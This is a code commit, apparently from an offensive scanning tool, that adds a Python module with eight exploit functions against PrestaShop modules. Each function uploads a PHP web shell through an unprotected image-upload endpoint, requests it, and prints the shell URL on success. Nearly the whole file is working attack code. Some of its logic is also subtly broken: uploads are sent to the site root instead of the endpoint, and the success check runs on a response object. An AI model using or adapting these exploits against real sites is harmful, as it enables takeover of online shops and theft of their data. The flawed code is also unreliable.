Added 8 Prestashop Exploits

modules/druExploits.py

@@ -0,0 +1 @@
+#waiting

modules/prestaExploits.py

@@ -0,0 +1,125 @@
+import requests
+import re
+import os
+Session = requests.Session()
+from common.colors import que,vulnexploit,que,failexploit
+
+#columnadvert
+def columnadverts(url,headers):
+    endpoint = url + "/modules/columnadverts/uploadimage.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/columnadverts/slides/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s column-advert         %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s column-advert         %s' %(que , failexploit))    
+
+#soopabanner
+def soopabanners(url,headers):
+    endpoint = url + "/modules/soopabanners/uploadimage.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/soopabanners/slides/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s soopa-banner          %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s soopa-banner          %s' %(que , failexploit))  
+
+#vtermslideshow
+def vtslide(url,headers):
+    endpoint = url + "/modules/vtermslideshow/uploadimage.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s vterm-slideshowbar    %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s vterm-slideshowbar    %s' %(que , failexploit))  
+
+#simpleslideshow
+def simpleslideshow(url,headers):
+    endpoint = url + "/modules/simpleslideshow/uploadimage.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/simpleslideshow/slides/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s simple-slideshow      %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s simple-slideshow      %s' %(que , failexploit))  
+
+#productpageadverts
+def productpageadverts(url,headers):
+    endpoint = url + "/modules/productpageadverts/uploadimage.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/productpageadverts/slides/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s pageadvertise         %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s pageadvertise         %s' %(que , failexploit))  
+
+#productpageadvertsb
+def productpageadvertsb(url,headers):
+    endpoint = url + "/modules/homepageadvertise2/uploadimage.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/homepageadvertise2/slides/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s pageadvertise2        %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s pageadvertise2        %s' %(que , failexploit))  
+
+#jro_homepageadvertise
+def jro_homepageadvertise(url,headers):
+    endpoint = url + "/modules/jro_homepageadvertise/uploadimage.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/jro_homepageadvertise/slides/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s jro_homepageadvertise %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s jro_homepageadvertise %s' %(que , failexploit))  
+
+#attributewizardpro
+def attributewizardpro(url,headers):
+    endpoint = url + "/modules/attributewizardpro/file_upload.php"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.php')
+    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/modules/attributewizardpro/file_uploads/VulnX.php?Vuln=X"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    if statusCheck:
+        print(' %s attribute-wizardpro   %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s attribute-wizardpro   %s' %(que , failexploit))